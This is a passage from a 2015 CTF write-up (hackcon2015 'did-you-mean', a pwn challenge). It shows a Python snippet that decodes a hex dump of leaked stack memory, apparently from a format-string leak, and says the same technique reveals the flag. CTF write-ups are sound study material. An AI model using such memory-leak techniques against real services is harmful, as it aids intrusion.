26 bits. We can use python to convert the stack into readable data:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">data</span> <span class="o">=</span> <span class="s">"07f7ef00e68707f7ef05c374004847464544434241504f4e4d4c4b4a49a00007f7ef05e45207fff414a69807fff414a6970f63d4e2e40043625786c25ffffffff786c25786c25786c6c25786c25786c2525786c25786c2578786c25786c25786c6c25786c25786c2525786c25786c2578786c25786c25786c6c25786c25786c2525786c25786c2578786c25786c25786c6c25786c25786c25786c25786c257839cc7d2e1411990007f7ef001cec50"</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mi">26</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">),</span> <span class="mi">16</span><span class="p">):</span> <span class="k">print</span> <span class="nb">repr</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span><span class="o">+</span><span class="mi">16</span><span class="p">].</span><span class="n">decode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)[::</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span></code></pre></figure> <p>The result is:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>'ABCDEFGH' 'IJKLMNOP' 'R\xe4\x05\xef\xf7\x07\x00\xa0' '\xff\x07\x98\xa6\x14\xf4\xff\x07' </code></pre></div></div> <p>We can use the same technique on the webservice and get the flag: <code class="language-plaintext highlighter-rouge">FORMAT(STR)</code>.</p> Thu, 20 Aug 2015 19:00:00 +0000 http://vimvaders.github.io/hackcon2015/2015/08/20/did-you-mean.html http://vimvaders.github.io/hackcon2015/2015/08/20/did-you-mean.html ctf pwn hackcon2015